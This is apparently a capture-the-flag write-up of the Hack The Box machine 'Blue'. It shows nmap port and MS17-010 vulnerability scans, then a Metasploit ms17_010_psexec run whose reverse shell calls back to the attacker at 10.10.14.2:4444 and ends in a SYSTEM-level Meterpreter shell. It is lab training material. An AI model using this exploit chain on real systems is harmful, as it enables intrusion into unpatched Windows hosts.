Blue

Following on from Legacy in number of pwns is Blue. I have heard of this one, and the name is a giveaway. Is it pretty much a clone of Legacy?

Ports

Not exactly; there are a bunch more ports for a start:

  1. 135/tcp open msrpc
  2. 139/tcp open netbios-ssn
  3. 445/tcp open microsoft-ds
  4. 49152/tcp open unknown
  5. 49153/tcp open unknown
  6. 49154/tcp open unknown
  7. 49155/tcp open unknown
  8. 49156/tcp open unknown
  9. 49157/tcp open unknown

SMB

We’ll do the same scan as Legacy:

┌──(root💀kali)-[/opt/htb/blue]
└─# nmap -p445 --script smb-vuln-ms17-010 10.10.10.40
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05 05:42 EST
Nmap scan report for 10.10.10.40
Host is up (0.24s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 4.15 seconds

And we’ll get the same result.

Yeeting MSF again again

I’ve never used Metasploit three times in an evening before. First time for everything I guess:

msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.10.14.2:4444 
[*] 10.10.10.40:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[*] 10.10.10.40:445 - Built a write-what-where primitive...
[+] 10.10.10.40:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.40:445 - Selecting PowerShell target
[*] 10.10.10.40:445 - Executing the payload...
[+] 10.10.10.40:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.2:4444 -> 10.10.10.40:49158) at 2021-03-05 05:45:16 -0500

meterpreter > shell
Process 1564 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Well, it’s a different version of the OS I guess. Devel will be next, but that’s for tomorrow.